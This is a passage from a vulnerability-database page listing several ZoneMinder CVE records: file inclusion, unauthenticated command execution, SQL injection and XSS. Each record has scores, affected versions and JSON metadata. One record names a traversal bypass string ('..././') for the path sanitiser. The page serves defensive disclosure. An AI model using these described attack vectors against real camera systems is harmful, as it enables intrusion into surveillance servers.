ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via /web/index.php. By controlling $view, any local file ending in .php can be executed. This is supposed to be mitigated by calling detaintPath, however dentaintPath does not properly sandbox the path. This can be exploited by constructing paths like "..././", which get replaced by "../". This issue is patched in versions 1.36.33 and 1.37.33.
Severity ?
8.1 (High)
CWE
- CWE-426 - Untrusted Search Path
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.515Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h5m9-6jjc-cgmw",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h5m9-6jjc-cgmw"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-26036",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-10T21:00:52.138858Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-10T21:05:32.166Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain a Local File Inclusion (Untrusted Search Path) vulnerability via /web/index.php. By controlling $view, any local file ending in .php can be executed. This is supposed to be mitigated by calling detaintPath, however dentaintPath does not properly sandbox the path. This can be exploited by constructing paths like \"..././\", which get replaced by \"../\". This issue is patched in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-426",
"description": "CWE-426: Untrusted Search Path",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-02-25T01:13:30.477Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h5m9-6jjc-cgmw",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-h5m9-6jjc-cgmw"
}
],
"source": {
"advisory": "GHSA-h5m9-6jjc-cgmw",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder contains Local File Inclusion vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26036",
"datePublished": "2023-02-25T01:13:30.477Z",
"dateReserved": "2023-02-17T22:44:03.148Z",
"dateUpdated": "2025-03-10T21:05:32.166Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-26035 (GCVE-0-2023-26035)
Vulnerability from nvd – Published: 2023-02-25 01:07 – Updated: 2025-02-13 16:44
VLAI?
Title
ZoneMinder vulnerable to Missing Authorization
Summary
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.
Severity ?
7.2 (High)
CWE
- CWE-862 - Missing Authorization
Assigner
References
| URL | Tags | |
|---|---|---|
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.33
Affected: >= 1.37.0, < 1.37.33 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T11:39:06.520Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/175675/ZoneMinder-Snapshots-Command-Injection.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.33"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.33"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-862",
"description": "CWE-862: Missing Authorization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-11-14T03:07:28.812Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr"
},
{
"url": "http://packetstormsecurity.com/files/175675/ZoneMinder-Snapshots-Command-Injection.html"
}
],
"source": {
"advisory": "GHSA-72rg-h4vf-29gr",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder vulnerable to Missing Authorization"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-26035",
"datePublished": "2023-02-25T01:07:01.906Z",
"dateReserved": "2023-02-17T22:44:03.148Z",
"dateUpdated": "2025-02-13T16:44:43.135Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-51482 (GCVE-0-2024-51482)
Vulnerability from cvelistv5 – Published: 2024-10-31 18:07 – Updated: 2024-11-08 16:49
VLAI?
Title
Boolean-based SQL Injection in ZoneMinder v1.37.* <= 1.37.64
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* <= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65.
Severity ?
10 (Critical)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | |||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
>= 1.37.0, < 1.37.65
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThanOrEqual": "1.37.64",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-51482",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-31T19:38:43.424341Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-11-08T16:49:08.199Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.65"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder v1.37.* \u003c= 1.37.64 is vulnerable to boolean-based SQL Injection in function of web/ajax/event.php. This is fixed in 1.37.65."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 10,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-05T13:41:25.010Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-qm8h-3xvf-m7j3"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/9e7d31841ed9678a7dd06869037686fc9925e59f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/9e7d31841ed9678a7dd06869037686fc9925e59f"
}
],
"source": {
"advisory": "GHSA-qm8h-3xvf-m7j3",
"discovery": "UNKNOWN"
},
"title": "Boolean-based SQL Injection in ZoneMinder v1.37.* \u003c= 1.37.64"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-51482",
"datePublished": "2024-10-31T18:07:25.310Z",
"dateReserved": "2024-10-28T14:20:59.335Z",
"dateUpdated": "2024-11-08T16:49:08.199Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-31493 (GCVE-0-2023-31493)
Vulnerability from cvelistv5 – Published: 2024-10-15 00:00 – Updated: 2024-10-16 18:56
VLAI?
Summary
RCE (Remote Code Execution) exists in ZoneMinder through 1.36.33 as an attacker can create a new .php log file in language folder, while executing a crafted payload and escalate privileges allowing execution of any commands on the remote system.
Severity ?
6.6 (Medium)
CWE
- n/a
Assigner
References
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThanOrEqual": "1.36.33",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-31493",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-16T18:53:24.875640Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-94",
"description": "CWE-94 Improper Control of Generation of Code (\u0027Code Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-16T18:56:57.965Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "RCE (Remote Code Execution) exists in ZoneMinder through 1.36.33 as an attacker can create a new .php log file in language folder, while executing a crafted payload and escalate privileges allowing execution of any commands on the remote system."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-15T14:53:42.080869",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "http://zoneminder.com"
},
{
"url": "https://medium.com/%40dk50u1/rce-remote-code-execution-in-zoneminder-up-to-1-36-33-0686f5bcd370"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2023-31493",
"datePublished": "2024-10-15T00:00:00",
"dateReserved": "2023-04-29T00:00:00",
"dateUpdated": "2024-10-16T18:56:57.965Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43360 (GCVE-0-2024-43360)
Vulnerability from cvelistv5 – Published: 2024-08-12 20:55 – Updated: 2024-08-15 19:00
VLAI?
Title
ZoneMinder Time-based SQL Injection
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
9.8 (Critical)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"status": "affected",
"version": "\\u003c.1.36.34"
},
{
"lessThanOrEqual": "1.37.61",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43360",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-15T18:53:18.459320Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-15T19:00:59.189Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:55:14.760Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/677f6a31551f128554f7b0110a52fd76453a657a"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/a194fe81d34c5eea2ab1dc18dc8df615fca634a6"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/bb07118118e23b5670c2c18be8be2cc6b8529397",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/bb07118118e23b5670c2c18be8be2cc6b8529397"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/de8f387207e9c506e8e8007eda725741a25601c5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/de8f387207e9c506e8e8007eda725741a25601c5"
}
],
"source": {
"advisory": "GHSA-9cmr-7437-v9fj",
"discovery": "UNKNOWN"
},
"title": "ZoneMinder Time-based SQL Injection"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43360",
"datePublished": "2024-08-12T20:55:14.760Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-15T19:00:59.189Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43359 (GCVE-0-2024-43359)
Vulnerability from cvelistv5 – Published: 2024-08-12 20:49 – Updated: 2024-08-13 17:05
VLAI?
Title
XSS vulnerabilities in montagereview
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the montagereview via the displayinterval, speed, and scale parameters. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThan": "1.36.34",
"status": "affected",
"version": "0",
"versionType": "custom"
},
{
"lessThan": "1.37.61",
"status": "affected",
"version": "1.37.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43359",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-13T17:03:34.296728Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-13T17:05:24.009Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the montagereview via the displayinterval, speed, and scale parameters. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 0,
"baseSeverity": "NONE",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:49:28.130Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-pjjm-3qxp-6hj8",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-pjjm-3qxp-6hj8"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/6cc64dddff6144a98680f65ecf8dc249028431af",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/6cc64dddff6144a98680f65ecf8dc249028431af"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/b51c5df0cb869ca48fccfc6e6fd7c19bf717ecd2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/b51c5df0cb869ca48fccfc6e6fd7c19bf717ecd2"
}
],
"source": {
"advisory": "GHSA-pjjm-3qxp-6hj8",
"discovery": "UNKNOWN"
},
"title": "XSS vulnerabilities in montagereview"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43359",
"datePublished": "2024-08-12T20:49:28.130Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-13T17:05:24.009Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43358 (GCVE-0-2024-43358)
Vulnerability from cvelistv5 – Published: 2024-08-12 20:46 – Updated: 2024-08-14 13:40
VLAI?
Title
XSS vulnerability in filter view
Summary
ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the filter view via the filter[Id]. This vulnerability is fixed in 1.36.34 and 1.37.61.
Severity ?
6.1 (Medium)
CWE
- CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
Affected: >= 1.37.0, < 1.37.61 |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43358",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-14T13:39:31.416791Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-14T13:40:05.699Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "zoneminder",
"vendor": "ZoneMinder",
"versions": [
{
"status": "affected",
"version": "\u003c 1.36.34"
},
{
"status": "affected",
"version": "\u003e= 1.37.0, \u003c 1.37.61"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder has a cross-site scripting vulnerability in the filter view via the filter[Id]. This vulnerability is fixed in 1.36.34 and 1.37.61."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-08-12T20:46:59.082Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-6rrw-66rf-6g5f",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-6rrw-66rf-6g5f"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/062cf568a33fb6a8604ec327b1de8bb2e0d1ff77",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/062cf568a33fb6a8604ec327b1de8bb2e0d1ff77"
},
{
"name": "https://github.com/ZoneMinder/zoneminder/commit/4602cd0470a3b90b18bcc44b3c86d963872d1ba0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/ZoneMinder/zoneminder/commit/4602cd0470a3b90b18bcc44b3c86d963872d1ba0"
}
],
"source": {
"advisory": "GHSA-6rrw-66rf-6g5f",
"discovery": "UNKNOWN"
},
"title": "XSS vulnerability in filter view"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43358",
"datePublished": "2024-08-12T20:46:59.082Z",
"dateReserved": "2024-08-09T14:23:55.511Z",
"dateUpdated": "2024-08-14T13:40:05.699Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-41884 (GCVE-0-2023-41884)
Vulnerability from cvelistv5 – Published: 2024-08-12 19:39 – Updated: 2024-08-13 17:34
VLAI?
Title
ZoneMinder Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in watch.php
Summary
ZoneMinder is a free, open source Closed-circuit television software application. In WWW/AJAX/watch.php, Line: 51 takes a few parameter in sql query without sanitizing it which makes it vulnerable to sql injection. This vulnerability is fixed in 1.36.34.
Severity ?
7.1 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| ZoneMinder | zoneminder |
Affected:
< 1.36.34
|
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "zoneminder",
"vendor": "zoneminder",
"versions": [
{
"lessThan": "1.36.34",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-41884",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
